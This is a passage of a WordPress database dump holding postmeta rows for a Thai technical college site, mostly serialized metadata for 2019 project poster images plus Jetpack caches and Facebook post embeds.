'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:102:\"2019/11/โครงการส่งเสริมทักษะภาษาอังกฤษ.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:102:\"โครงการส่งเสริมทักษะภาษาอังกฤษ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:102:\"โครงการส่งเสริมทักษะภาษาอังกฤษ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:103:\"โครงการส่งเสริมทักษะภาษาอังกฤษ-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:103:\"โครงการส่งเสริมทักษะภาษาอังกฤษ-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:102:\"โครงการส่งเสริมทักษะภาษาอังกฤษ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15111, 6379, '_wp_attached_file', '2019/11/โครงการอนุรักษ์พันธุกรรมพืช.jpg'),
(15112, 6379, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:93:\"2019/11/โครงการอนุรักษ์พันธุกรรมพืช.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:93:\"โครงการอนุรักษ์พันธุกรรมพืช-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:93:\"โครงการอนุรักษ์พันธุกรรมพืช-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:94:\"โครงการอนุรักษ์พันธุกรรมพืช-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:94:\"โครงการอนุรักษ์พันธุกรรมพืช-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:93:\"โครงการอนุรักษ์พันธุกรรมพืช-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15113, 6380, '_wp_attached_file', '2019/11/โครงการอบรมเชิงปฏิบัติการฟื้นฟูป่าชายเลน.jpg'),
(15114, 6380, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:132:\"2019/11/โครงการอบรมเชิงปฏิบัติการฟื้นฟูป่าชายเลน.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:132:\"โครงการอบรมเชิงปฏิบัติการฟื้นฟูป่าชายเลน-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:132:\"โครงการอบรมเชิงปฏิบัติการฟื้นฟูป่าชายเลน-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:133:\"โครงการอบรมเชิงปฏิบัติการฟื้นฟูป่าชายเลน-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:133:\"โครงการอบรมเชิงปฏิบัติการฟื้นฟูป่าชายเลน-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:132:\"โครงการอบรมเชิงปฏิบัติการฟื้นฟูป่าชายเลน-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15115, 6381, '_wp_attached_file', '2019/11/โครงการอาชีวศึกษาบูรณาการอาชีพ-108.jpg'),
(15116, 6381, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:106:\"2019/11/โครงการอาชีวศึกษาบูรณาการอาชีพ-108.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:106:\"โครงการอาชีวศึกษาบูรณาการอาชีพ-108-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:106:\"โครงการอาชีวศึกษาบูรณาการอาชีพ-108-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:107:\"โครงการอาชีวศึกษาบูรณาการอาชีพ-108-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:107:\"โครงการอาชีวศึกษาบูรณาการอาชีพ-108-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:106:\"โครงการอาชีวศึกษาบูรณาการอาชีพ-108-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15117, 6382, '_wp_attached_file', '2019/11/ประกาศ-อวท-2561-29.jpg'),
(15118, 6382, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:724;s:6:\"height\";i:1024;s:4:\"file\";s:48:\"2019/11/ประกาศ-อวท-2561-29.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-29-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-29-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-29-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-29-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15119, 6383, '_wp_attached_file', '2019/11/สิ่งประดิษฐ์แก้ไข.jpg'),
(15120, 6383, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:63:\"2019/11/สิ่งประดิษฐ์แก้ไข.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:63:\"สิ่งประดิษฐ์แก้ไข-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:63:\"สิ่งประดิษฐ์แก้ไข-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:64:\"สิ่งประดิษฐ์แก้ไข-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:64:\"สิ่งประดิษฐ์แก้ไข-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:63:\"สิ่งประดิษฐ์แก้ไข-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15121, 6312, '_jetpack_related_posts_cache', 'a:1:{s:32:\"d739a53b815bf8a2853fb5aad028ac73\";a:2:{s:7:\"expires\";i:1575306917;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5166;}i:1;a:1:{s:2:\"id\";i:4107;}i:2;a:1:{s:2:\"id\";i:5388;}}}}'),
(15122, 6314, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575306957;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5291;}i:1;a:1:{s:2:\"id\";i:5029;}i:2;a:1:{s:2:\"id\";i:5301;}}}}'),
(15123, 6310, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575657738;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5671;}i:1;a:1:{s:2:\"id\";i:4163;}i:2;a:1:{s:2:\"id\";i:4107;}}}}'),
(15124, 6023, '_oembed_f0c405275b6e244310c9989f07bb9bdb', '<div id=\"fb-root\"></div><script async=\"1\" defer=\"1\" crossorigin=\"anonymous\" src=\"https://connect.facebook.net/th_TH/sdk.js#xfbml=1&version=v5.0\"></script><div class=\"fb-post\" data-href=\"https://www.facebook.com/photo.php?fbid=503923960356516&set=a.106420140106902&type=3&theater\" data-width=\"750\"><blockquote cite=\"https://www.facebook.com/photo.php?fbid=503923960356516&set=a.106420140106902&type=3\" class=\"fb-xfbml-parse-ignore\">โพสต์โดย <a href=\"https://www.facebook.com/eec.rayong.7\">Eec Tvet Rayong</a> เมื่อ <a href=\"https://www.facebook.com/photo.php?fbid=503923960356516&set=a.106420140106902&type=3\">วันอังคารที่ 23 กรกฎาคม 2019</a></blockquote></div>'),
(15125, 6023, '_oembed_time_f0c405275b6e244310c9989f07bb9bdb', '1575951320'),
(15126, 6043, '_oembed_82db8e9985af13b12378ad9d766bea48', '<div id=\"fb-root\"></div><script async=\"1\" defer=\"1\" crossorigin=\"anonymous\" src=\"https://connect.facebook.net/th_TH/sdk.js#xfbml=1&version=v5.0\"></script><div class=\"fb-post\" data-href=\"https://www.facebook.com/photo.php?fbid=864855897223933&set=a.105012223208308&type=3&theater\" data-width=\"750\"><blockquote cite=\"https://www.facebook.com/photo.php?fbid=864855897223933&set=a.495086494200877&type=3\" class=\"fb-xfbml-parse-ignore\"><p>วิทยาลัยเทคนิคระยอง</p>โพสต์โดย <a href=\"https://www.facebook.com/people/งานประชาสัมพันธ์-วทระยอง/100010985913485\">งานประชาสัมพันธ์ วท.ระยอง</a> เมื่อ <a href=\"https://www.facebook.com/photo.php?fbid=864855897223933&set=a.495086494200877&type=3\">วันพุธที่ 31 กรกฎาคม 2019</a></blockquote></div>'),
(15127, 6043, '_oembed_time_82db8e9985af13b12378ad9d766bea48', '1575952143'),
(15128, 6389, '_wp_attached_file', '2019/12/27.-โครงการถวานเทียนจำนำพรรษา-.jpg'),
(15129, 6389, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:92:\"2019/12/27.-โครงการถวานเทียนจำนำพรรษา-.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:92:\"27.-โครงการถวานเทียนจำนำพรรษา--150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:92:\"27.-โครงการถวานเทียนจำนำพรรษา--212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:93:\"27.-โครงการถวานเทียนจำนำพรรษา--768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:93:\"27.-โครงการถวานเทียนจำนำพรรษา--724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:92:\"27.-โครงการถวานเทียนจำนำพรรษา--212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15130, 6390, '_wp_attached_file', '2019/12/โครงการส่งเสริมการหารรายได้ระหว่างเรียน.jpg'),
(15131, 6390, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:129:\"2019/12/โครงการส่งเสริมการหารรายได้ระหว่างเรียน.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:129:\"โครงการส่งเสริมการหารรายได้ระหว่างเรียน-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:129:\"โครงการส่งเสริมการหารรายได้ระหว่างเรียน-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:130:\"โครงการส่งเสริมการหารรายได้ระหว่างเรียน-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:130:\"โครงการส่งเสริมการหารรายได้ระหว่างเรียน-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:129:\"โครงการส่งเสริมการหารรายได้ระหว่างเรียน-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15132, 6391, '_wp_attached_file', '2019/12/โครงการกีฬาสีภายใน.jpg'),
(15133, 6391, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:66:\"2019/12/โครงการกีฬาสีภายใน.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:66:\"โครงการกีฬาสีภายใน-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:66:\"โครงการกีฬาสีภายใน-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:67:\"โครงการกีฬาสีภายใน-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:67:\"โครงการกีฬาสีภายใน-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:66:\"โครงการกีฬาสีภายใน-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15136, 6394, '_wp_attached_file', '2019/12/โครงการแข่งทักษะ.jpg'),
(15137, 6394, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:60:\"2019/12/โครงการแข่งทักษะ.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"โครงการแข่งทักษะ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"โครงการแข่งทักษะ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:61:\"โครงการแข่งทักษะ-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:61:\"โครงการแข่งทักษะ-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"โครงการแข่งทักษะ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15138, 6395, '_wp_attached_file', '2019/12/โครงการตอบปัญหาวิชาการฯ.jpg'),
(15139, 6395, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:81:\"2019/12/โครงการตอบปัญหาวิชาการฯ.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:81:\"โครงการตอบปัญหาวิชาการฯ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:81:\"โครงการตอบปัญหาวิชาการฯ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:82:\"โครงการตอบปัญหาวิชาการฯ-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:82:\"โครงการตอบปัญหาวิชาการฯ-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:81:\"โครงการตอบปัญหาวิชาการฯ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15140, 6396, '_wp_attached_file', '2019/12/โครงการตะกร้อ.jpg'),
(15141, 6396, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:51:\"2019/12/โครงการตะกร้อ.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:51:\"โครงการตะกร้อ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:51:\"โครงการตะกร้อ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:52:\"โครงการตะกร้อ-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:52:\"โครงการตะกร้อ-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:51:\"โครงการตะกร้อ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15142, 6397, '_wp_attached_file', '2019/12/โครงการไหว้ครูช่างเชื่อม.jpg'),
(15143, 6397, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:84:\"2019/12/โครงการไหว้ครูช่างเชื่อม.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:84:\"โครงการไหว้ครูช่างเชื่อม-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:84:\"โครงการไหว้ครูช่างเชื่อม-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:85:\"โครงการไหว้ครูช่างเชื่อม-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:85:\"โครงการไหว้ครูช่างเชื่อม-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:84:\"โครงการไหว้ครูช่างเชื่อม-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15144, 6398, '_wp_attached_file', '2019/12/โครงการอนุรักษ์พันธุกรรมพืช.jpg'),
(15145, 6398, '_wp_attachment_metadata', 